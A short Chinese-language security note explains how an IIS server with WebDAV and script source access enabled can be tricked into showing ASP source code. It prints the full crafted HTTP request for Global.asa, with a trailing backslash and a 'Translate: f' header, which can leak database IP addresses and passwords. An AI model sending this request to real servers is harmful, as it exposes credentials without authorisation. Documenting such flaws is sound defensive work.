当IIS在webdav功能开启的状态下。如果web使用了Global.asa这个文件结构,可以通过特殊HTTP请求,看到其源代码。造成数据库IP和口令泄露。
XML/HTML代码 GET /global.asa\ HTTP/1.0 Accept: * / * Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32) Host: 127.0.0.1 Referer: http://www.0e0.com.cn/ Translate: f Content-Type: application/x-www-form-urlencoded
在webdav和脚本资源访问都打开的情况下,通过上边的请求,可以看到ASP等文件的源代码。而webdav都是默认打开的,所以当打开脚本资源访问选项时就会激活此问题
